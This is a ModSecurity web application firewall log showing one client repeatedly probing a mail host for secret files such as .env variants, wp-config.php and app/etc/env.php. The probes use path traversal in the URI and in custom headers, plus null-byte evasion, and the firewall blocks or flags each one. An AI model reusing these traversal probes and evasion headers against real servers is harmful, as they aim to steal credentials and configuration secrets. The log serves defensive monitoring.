[Tue May 12 05:30:09.374216 2026] [security2:error] [pid 1825287:tid 1825324] [client 45.148.10.247:63002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/_next/image/"] [unique_id "agKewQgpmE1yW0glLdguPwAAANM"]
[Tue May 12 05:30:09.385801 2026] [security2:error] [pid 1825179:tid 1825214] [client 45.148.10.247:62962] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.backup"] [unique_id "agKewdr1yOh9TvizezifpAAAAFA"]
[Tue May 12 05:30:09.385995 2026] [security2:error] [pid 1825179:tid 1825214] [client 45.148.10.247:62962] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.backup"] [unique_id "agKewdr1yOh9TvizezifpAAAAFA"]
[Tue May 12 05:30:09.849186 2026] [security2:error] [pid 1844863:tid 1844883] [client 43.157.20.63:38448] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKewfaAnTZtx1_H_wy3dQAAAU4"]
[Tue May 12 05:30:09.875100 2026] [security2:error] [pid 1842385:tid 1842400] [client 45.148.10.247:57446] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeuRs7kySIUZ3ORnIl-AAAAQo"]
[Tue May 12 05:30:09.902537 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.247:63024] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKewRfeipD4uoG21FowygAAAAg"]
[Tue May 12 05:30:09.902620 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.247:63024] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKewRfeipD4uoG21FowygAAAAg"]
[Tue May 12 05:30:09.902761 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.247:63024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.production"] [unique_id "agKewRfeipD4uoG21FowygAAAAg"]
[Tue May 12 05:30:10.914131 2026] [security2:error] [pid 1842385:tid 1842398] [client 45.148.10.247:57638] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeuhs7kySIUZ3ORnIl-wAAAQg"]
[Tue May 12 05:30:11.391052 2026] [security2:error] [pid 1844863:tid 1844882] [client 45.148.10.247:63028] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKew_aAnTZtx1_H_wy3dwAAAU0"]
[Tue May 12 05:30:11.391110 2026] [security2:error] [pid 1844863:tid 1844882] [client 45.148.10.247:63028] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKew_aAnTZtx1_H_wy3dwAAAU0"]
[Tue May 12 05:30:11.391138 2026] [security2:error] [pid 1844863:tid 1844882] [client 45.148.10.247:63028] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKew_aAnTZtx1_H_wy3dwAAAU0"]
[Tue May 12 05:30:11.391740 2026] [security2:error] [pid 1844863:tid 1844882] [client 45.148.10.247:63028] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/v1/health"] [unique_id "agKew_aAnTZtx1_H_wy3dwAAAU0"]
[Tue May 12 05:30:11.992151 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.247:57586] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeus1tk6y7yBJLpJo5rgAAAII"]
[Tue May 12 05:30:12.011615 2026] [security2:error] [pid 1825287:tid 1825311] [client 45.148.10.247:57470] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeuQgpmE1yW0glLdguMAAAAMY"]
[Tue May 12 05:30:12.140139 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.247:62928] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKevs1tk6y7yBJLpJo5swAAAJc"]
[Tue May 12 05:30:12.159160 2026] [security2:error] [pid 1842385:tid 1842411] [client 45.148.10.247:62860] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKevBs7kySIUZ3ORnIl_QAAARQ"]
[Tue May 12 05:30:12.819451 2026] [security2:error] [pid 1825287:tid 1825326] [client 45.148.10.247:63036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.dev"] [unique_id "agKexAgpmE1yW0glLdguRQAAANQ"]
[Tue May 12 05:30:12.819629 2026] [security2:error] [pid 1825287:tid 1825326] [client 45.148.10.247:63036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.dev"] [unique_id "agKexAgpmE1yW0glLdguRQAAANQ"]
[Tue May 12 05:30:12.828289 2026] [security2:error] [pid 1844863:tid 1844888] [client 45.148.10.247:62902] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKevvaAnTZtx1_H_wy3cwAAAVM"]
[Tue May 12 05:30:13.394085 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.247:63058] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKexRfeipD4uoG21Fow0AAAAA0"]
[Tue May 12 05:30:13.394216 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.247:63058] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKexRfeipD4uoG21Fow0AAAAA0"]
[Tue May 12 05:30:13.394392 2026] [security2:error] [pid 1808852:tid 1808868] [client 45.148.10.247:63058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/wp-config.php"] [unique_id "agKexRfeipD4uoG21Fow0AAAAA0"]
[Tue May 12 05:30:14.079810 2026] [security2:error] [pid 1842385:tid 1842397] [client 45.148.10.247:62952] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKevhs7kySIUZ3ORnIl_wAAAQc"]
[Tue May 12 05:30:14.506022 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.247:29796] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKexggpmE1yW0glLdguUAAAANY"]
[Tue May 12 05:30:14.506166 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.247:29796] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKexggpmE1yW0glLdguUAAAANY"]
[Tue May 12 05:30:14.506200 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.247:29796] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKexggpmE1yW0glLdguUAAAANY"]
[Tue May 12 05:30:14.506411 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.247:29796] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKexggpmE1yW0glLdguUAAAANY"]
[Tue May 12 05:30:14.506466 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.247:29796] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKexggpmE1yW0glLdguUAAAANY"]
[Tue May 12 05:30:14.506500 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.247:29796] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKexggpmE1yW0glLdguUAAAANY"]
[Tue May 12 05:30:14.506923 2026] [security2:error] [pid 1825287:tid 1825328] [client 45.148.10.247:29796] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/api/health"] [unique_id "agKexggpmE1yW0glLdguUAAAANY"]
[Tue May 12 05:30:15.033805 2026] [security2:error] [pid 1825179:tid 1825202] [client 45.148.10.247:62954] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKewNr1yOh9TvizezifowAAAEQ"]
[Tue May 12 05:30:15.058794 2026] [security2:error] [pid 1825287:tid 1825310] [client 45.148.10.247:57432] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeuQgpmE1yW0glLdguMQAAAMU"]
[Tue May 12 05:30:15.822143 2026] [security2:error] [pid 1820198:tid 1820207] [client 45.148.10.247:57518] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeuc1tk6y7yBJLpJo5qwAAAIc"]
[Tue May 12 05:30:16.394089 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.247:29832] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env.example"] [unique_id "agKeyPaAnTZtx1_H_wy3gwAAAVc"]
[Tue May 12 05:30:16.394273 2026] [security2:error] [pid 1844863:tid 1844892] [client 45.148.10.247:29832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env.example"] [unique_id "agKeyPaAnTZtx1_H_wy3gwAAAVc"]
[Tue May 12 05:30:16.425314 2026] [security2:error] [pid 1825287:tid 1825319] [client 45.148.10.247:29844] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/app/etc/env.php"] [unique_id "agKeyAgpmE1yW0glLdguUwAAAM4"]
